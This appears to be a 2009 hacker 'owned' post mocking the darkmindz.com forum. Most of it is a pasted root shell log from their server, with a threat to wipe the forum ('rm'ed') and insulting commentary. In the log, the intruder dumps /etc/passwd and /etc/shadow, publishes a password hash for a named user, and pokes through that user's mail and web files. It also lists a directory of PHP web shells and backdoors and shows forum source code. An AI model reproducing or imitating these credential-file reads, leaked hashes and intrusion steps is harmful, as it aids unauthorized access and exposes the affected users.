anti-sec propaganda via imageshack? You can't enjoy the benefits of a blackhat
and run some retarded haxor forum at the same time pal, good to see that you
realized that. But in any case if you decide to put your shitty forum online
again, you will be rm'ed.

Here's what we found in darkmindz land.

root@www.darkmindz.com's password:
Last login: Sat May 23 03:39:06 2009 from cpe-76-175-20-182.socal.res.rr.com
ALERT! You are entering a secured area! Your IP and login information
have been recorded. System administration has been notified.
This system is restricted to authorized access only. All activities on
this system are recorded and logged. Unauthorized access will be fully
investigated and reported to the appropriate law enforcement agencies.

root@server2:~[root@server2 ~]# uname -a; id
Linux server2.hr-development.net 2.6.27.10-grsec #1 SMP Fri May 15 21:34:11 PDT 2009 x86_64 x86_64 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel)
root@server2:~[root@server2 ~]# #who up in this mother fucker
root@server2:~[root@server2 ~]# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
dovecot:x:104:104::/home/dovecot:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
hrdev:x:502:503::/home/hrdev:/bin/false
keytraderz:x:504:505::/home/keytraderz:/bin/false
yourkicks:x:507:508::/home/yourkicks:/bin/false
aaa:x:508:509::/home/aaa:/bin/false
beyond:x:509:510::/home/beyond:/bin/false
hotglow:x:510:511::/home/hotglow:/bin/false
wheelglow:x:512:513::/home/wheelglow:/bin/false
penguin:x:513:514::/home/penguin:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
furiogamin:x:516:517::/home/furiogamin:/bin/false
kaza:x:517:518::/home/kaza:/bin/false
pimpinjg:x:518:519::/home/pimpinjg:/bin/false
dakilla:x:521:522::/home/dakilla:/bin/false
bootroot:x:522:523::/home/bootroot:/bin/false
scraft758:x:525:526::/home/scraft758:/bin/false
hstrike:x:526:527::/home/hstrike:/bin/false
romeo:x:528:529::/home/romeo:/bin/false
xckx:x:529:530::/home/xckx:/bin/false
h3mod:x:530:531::/home/h3mod:/bin/false
clamav:x:533:534:Clam AntiVirus:/home/clamav:/bin/false
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:105:105:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
hbxmike:x:535:536::/home/hbxmike:/bin/false
wtfsmilez:x:536:537::/home/wtfsmilez:/bin/false
haiobr:x:537:538::/home/haiobr:/bin/false
odin:x:538:539::/home/odin:/bin/false
sam:x:539:540::/home/sam:/bin/false
mrgod:x:540:541::/home/mrgod:/bin/false
pagewiz:x:541:542::/home/pagewiz:/bin/false
zer0:x:542:543::/home/zer0:/bin/false
dablitz:x:543:544::/home/dablitz:/bin/false
ristop:x:544:545::/home/ristop:/bin/false
bloo:x:545:546::/home/bloo:/bin/false
root@server2:~[root@server2 ~]# grep romeo /etc/shadow
romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
root@server2:~[root@server2 ~]# w
 04:05:41 up 18:48,  1 user,  load average: 0.34, 0.34, 0.23
USER	 TTY	  FROM		    LOGIN@   IDLE   JCPU   PCPU WHAT
root	 pts/0	  cpe-76-1x5-xx-xx 03:39   26:24   0.00s  0.00s -bash
root@server2:~[root@server2 ~]# ls -al
total 30488
drwxr-x--- 11 root    root	 4096 May 23 02:47 .
drwx--x--x 25 root    root	 4096 May 22 09:26 ..
-rw-------  1 root    root	 1132 Mar 11 01:44 anaconda-ks.cfg
-rw-r--r--  1 root    root	    0 May 20 17:26 authorized_keys2
-rwxr-xr-x  1 root    root	   10 May 23 03:02 .bash_history
-rw-r--r--  1 root    root	   24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root    root	  191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root    root	  176 Jan  6  2007 .bashrc
drwxrwxrwx 24	 1000	1000	 4096 Apr 28 14:55 clamav-0.95.1
-rw-r--r--  1 root    root   24260964 Apr  8 08:24 clamav-0.95.1.tar.gz
-rw-r--r--  1 root    root     171053 May 22 13:49 cleaned_shells_php.txt
drwxr-xr-x  4 root    root	 4096 Mar 18 00:50 .cpan
-rw-r--r--  1 root    root	  100 Jan  6  2007 .cshrc
-rw-r--r--  1 root    root	    4 Jan 12 16:21 .custombuild
-rwxr-xr-x  1 root    root	21171 Jan 13 14:13 da.cpanel.import.pl
-rw-r--r--  1 root    root	  288 Mar 31 05:21 defaults.conf
drwxr-xr-x  2 root    root	 4096 Mar 23 19:03 export
-rw-r--r--  1 root    root	 1155 May 15 22:15 f.c
drwxr-xr-x  3 root    root	 4096 May 12 20:35 forum
-rw-r--r--  1 root    root	  265 May 14 15:19 ifconfig
drwxr-xr-x  2 root    root	 4096 Mar 23 19:03 import
-rw-------  1 root    root	12288 Mar 27 04:26 .import.swp
-rw-r--r--  1 root    root	 1724 Apr  1 18:53 initsec
-rw-------  1 root    root	   97 May 23 04:02 .lesshst
-rw-r--r--  1 root    root	   27 May 23 02:35 load
-rw-------  1 root    root	   42 Feb  5 17:18 .my.cnf
-rw-------  1 root    root	   37 May  2 15:19 .mysql_history
-rw-r--r--  1 root    root	    9 Mar 31 05:21 .mytop
drwxr-xr-x 16 webapps apache	 4096 Apr 28 16:11 nmap-4.85BETA8
-rw-r--r--  1 root    root    6484436 Apr 21 14:38 nmap-4.85BETA8.tar.bz2
drwxr-xr-x  3 root    root	 4096 May 20 14:31 qurantine
-rw-------  1 root    root	 1024 Apr  2 18:01 .rnd
-rwxr-xr-x  1 root    root	 2024 Apr 28 14:44 scan.pl
drwx------  2 root    root	 4096 May 20 15:00 .ssh
-rw-r--r--  1 root    root	  129 Jan  6  2007 .tcshrc
-rw-------  1 root    root	12288 May 23 03:02 .test.swp
drwxr-xr-x  2 root    root	 4096 May 14 14:00 tmp
-rwxr-xr-x  1 root    root	47429 May 16  2008 tuning-primer.sh
root@server2:~[root@server2 ~]# cat .bash_history
exit
exit
root@server2:~[root@server2 ~]# #omg nmap, SECURE HOSTING
root@server2:~[root@server2 ~]# date
Sat May 23 04:06:57 PDT 2009
root@server2:~[root@server2 ~]# cd /home/romeo/
root@server2:/home/romeo[root@server2 romeo]# ls -al
total 44
drwx--x--x  6 romeo romeo 4096 Apr 22 15:51 .
drwx--x--x 36 root  root  4096 May 23 02:33 ..
drwx------  2 romeo romeo 4096 Feb 17 16:07 backups
-rw-r--r--  1 romeo romeo   33 Dec 22 09:57 .bash_logout
-rw-r--r--  1 romeo romeo  176 Dec 22 09:57 .bash_profile
-rw-r--r--  1 romeo romeo  124 Dec 22 09:57 .bashrc
-rw-------  1 romeo romeo    0 Feb  8 08:45 .clipboard.txt
drwx--x--x  4 romeo romeo 4096 Dec 23 14:31 domains
drwxrwx---  4 romeo mail  4096 Feb 17 16:07 imap
drwxrwx---  5 romeo mail  4096 Dec 23 08:29 Maildir
lrwxrwxrwx  1 romeo romeo   35 Feb 17 16:07 public_html -> ./domains/darkmindz.com/public_html
-rw-r-----  1 romeo mail    34 Apr 19 16:26 .shadow
root@server2:/home/romeo[root@server2 romeo]# du -ch Maildir/
4.0K	Maildir/tmp
68M	Maildir/new
4.0K	Maildir/cur
68M	Maildir/
68M	total
root@server2:/home/romeo[root@server2 romeo]# #nice, thanks
root@server2:/home/romeo[root@server2 romeo]# cd domains
root@server2:/home/romeo/domains[root@server2 domains]# ls -la
total 16
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
root@server2:/home/romeo/domains[root@server2 domains]# cd darkmindz.com
root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# ls -la
total 40
drwx--x--x  7 romeo romeo  4096 Apr 22 15:53 .
drwx--x--x  4 romeo romeo  4096 Dec 23 14:31 ..
drwxr-xr-x  2 romeo romeo  4096 Dec 22 09:57 .htpasswd
drwxr-xr-x  2 root  root   4096 May 23 00:10 logs
drwx--x--x  3 romeo romeo  4096 Dec 22 09:57 public_ftp
drwxr-xr-x 15 romeo romeo  4096 May 20 14:30 public_html
drwxr-xr-x  2 root  root   4096 May  1 00:10 stats
-rw-r--r--  1 romeo romeo 12151 Feb  9 09:01 view_topic.php
root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# cd public_html/
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2 public_html]# ls -al
total 47264
drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
-rw-r--r--  1 romeo romeo 46487316 May 23 04:07 stress_test.txt
-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2 public_html]# ls -la scripts/
total 476
drwxr-xr-x  2 romeo romeo   4096 Feb  7 13:38 .
drwxr-xr-x 15 romeo romeo   4096 May 20 14:30 ..
-rw-r--r--  1 romeo romeo   4770 Jan 13 12:11 builder.js
-rw-r--r--  1 romeo romeo    588 Jan 13 12:11 cli.js
-rw-r--r--  1 romeo romeo  35851 Jan 13 12:12 controls.js
-rw-r--r--  1 romeo romeo  35253 Jan 13 12:11 dragdrop.js
-rw-r--r--  1 romeo romeo  38986 Jan 13 12:12 effects.js
-rw-r--r--  1 romeo romeo   8663 Feb 14 12:40 functions.js
-rw-r--r--  1 romeo romeo   6897 Jan 13 12:11 growl.js
-rw-r--r--  1 romeo romeo  63854 Jan 13 12:11 lightwindow.js
-rw-r--r--  1 romeo romeo  52665 Jan 13 12:12 php.min.js
-rw-r--r--  1 romeo romeo   1457 Jan 13 12:11 pm.js
-rw-r--r--  1 romeo romeo   1637 Jan 13 12:11 pngfix.js
-rw-r--r--  1 romeo romeo   3261 Jan 13 12:11 proto.menu.js
-rw-r--r--  1 romeo romeo 130380 Jan 13 12:12 prototype.js
-rw-r--r--  1 romeo romeo   2733 Jan 13 12:11 register.js
-rw-r--r--  1 romeo romeo   2711 Jan 13 12:11 scriptaculous.js
-rw-r--r--  1 romeo romeo    121 Jan 13 12:11 shoutbox.js
-rw-r--r--  1 romeo romeo  10296 Jan 13 12:12 slider.js
-rw-r--r--  1 romeo romeo   1920 Jan 13 12:12 sound.js
-rw-r--r--  1 romeo romeo  20197 Jan 13 12:12 unittest.js
-rw-r--r--  1 romeo romeo   6145 Feb 14 12:40 user.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la shell/
total 1564
drwxr-xr-x  2 root  root    4096 May 20 14:30 .
drwxr-xr-x 15 romeo romeo   4096 May 20 14:30 ..
-rw-r--r--  1 romeo romeo   1297 Feb 16 21:05 ajan.txt
-rw-r--r--  1 romeo romeo  44210 Feb 16 21:06 b64.txt
-rw-r--r--  1 romeo romeo    140 Feb 16 21:06 backdoor.txt
-rw-r--r--  1 romeo romeo  11141 Feb 16 21:06 c101.txt
-rw-r--r--  1 romeo romeo   1468 Feb 16 21:06 cmd.txt
-rw-r--r--  1 romeo romeo  18519 Feb 16 21:06 codeanalyzer.txt
-rw-r--r--  1 romeo romeo 114861 Feb 16 21:06 constance.txt
-rw-r--r--  1 romeo romeo  40682 Feb 16 21:06 CrystalShell v.1.txt
-rw-r--r--  1 romeo romeo  83029 Feb 16 21:06 CyberSpy5.txt
-rw-r--r--  1 romeo romeo  43394 Feb 16 21:06 dC3 Security Crew Shell PRiV.txt
-rw-r--r--  1 romeo romeo 111446 Feb 16 21:06 DxShell.1.0.txt
-rw-r--r--  1 romeo romeo  39433 Feb 16 21:06 eko.txt
-rw-r--r--  1 romeo romeo  38479 Feb 16 21:06 ELMALISEKER Backd00r.txt
-rw-r--r--  1 romeo romeo  24829 Feb 16 21:06 GFS web-shell ver 3.1.7 - PRiV8.txt
-rw-r--r--  1 romeo romeo   2089 Feb 16 21:06 imageshell.JPG
-rw-r--r--  1 romeo romeo   1768 Feb 16 21:06 index.php
-rw-r--r--  1 romeo romeo  17440 Feb 16 21:06 kscript.txt
-rw-r--r--  1 romeo romeo   2342 Feb 16 21:06 l0ger.txt
-rw-r--r--  1 romeo romeo   1683 Feb 16 21:06 LocalLinuxExploitFinder.txt
-rw-r--r--  1 romeo romeo  33796 Feb 16 21:06 Mysql interface v1.0.txt
-rw-r--r--  1 romeo romeo  34398 Feb 16 21:06 mysql.txt
-rw-r--r--  1 romeo romeo  38856 Feb 16 21:06 ntdaddy.txt
-rw-r--r--  1 romeo romeo 124953 Feb 16 21:06 r57.txt
-rw-r--r--  1 romeo romeo 103794 Feb 16 21:06 SnIpEr_SA Shell.txt
-rw-r--r--  1 romeo romeo   7002 Feb 16 21:06 steg.txt
-rw-r--r--  1 romeo romeo 139788 Feb 16 21:06 tdshell.txt
-rw-r--r--  1 romeo romeo  70402 Feb 16 21:06 webadmin.txt
-rw-r--r--  1 romeo romeo   5057 Feb 16 21:06 WinX Shell.txt
-rw-r--r--  1 romeo romeo   2455 Feb 16 21:06 Worse Linux Shell.txt
-rw-r--r--  1 romeo romeo 304936 Feb 16 21:06 x2300_mod.txt
-rw-r--r--  1 romeo romeo  10418 Feb 16 21:06 XSSscan.py.txt
-rw-r--r--  1 romeo romeo  10269 Feb 16 21:06 xx.txt
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# #ELEET
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -al
total 47264
drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
-rw-r--r--  1 romeo romeo 46488303 May 23 04:08 stress_test.txt
-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# cat test.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la
total 47264
drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
-rw-r--r--  1 romeo romeo 46488756 May 23 04:08 stress_test.txt
-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# less ucp.php
is_online){redirect("/".root()."index.php");}

$mode = isset($_GET['settings']) ? secureit($_GET['settings']) : 'default';
$auid = (int)isset($_GET['uid']) ? $_GET['uid'] : '';
$switch = isset($_GET['action']) ? $_GET['action'] : '';

$uid = $config['global']['user']['id'];
if((int)isset($_GET['uid']) && $_user->check_permissions($config['global']['user']['id'], ($mode!='avatar' ? GMOD : MOD)) ){
    $uid = (int)$_GET['uid'];
}else{
    $uid = $config['global']['user']['id'];
ucp.php root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# cd core
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# ls -al
total 164
drwxr-xr-x  6 romeo romeo  4096 Feb  7 13:38 .
drwxr-xr-x 15 romeo romeo  4096 May 20 14:30 ..
-rw-r--r--  1 romeo romeo   731 Jan 13 07:34 admin.js
-rw-r--r--  1 romeo romeo 27395 Feb 18 09:08 base_functions.php
-rw-r--r--  1 romeo romeo  9098 Feb 21 10:50 bbcode_tags.php
-rw-r--r--  1 romeo romeo  2816 Feb  1 08:55 cacher.php
drwxr-xr-x  4 romeo romeo  4096 Feb 10 13:29 classes
-rw-r--r--  1 romeo romeo  1436 Feb  2 08:33 cli.php
-rw-r--r--  1 romeo romeo  2848 Feb  8 08:46 config.php
-rw-r--r--  1 romeo romeo 23810 Apr 19 16:45 core.php
-rw-r--r--  1 romeo romeo  4518 Feb  1 08:55 cron.php
drwxr-xr-x  2 romeo romeo  4096 Feb  7 13:38 err
-rw-r--r--  1 romeo romeo   236 Feb  2 08:33 force_user.php
drwxr-xr-x  2 romeo romeo  4096 Feb  7 13:38 functions
-rw-r--r--  1 romeo romeo  1181 Feb  2 08:33 key.php
-rw-r--r--  1 romeo romeo  6903 Feb  2 08:33 mailer.php
drwxr-xr-x  6 romeo romeo  4096 Feb  7 13:38 mint
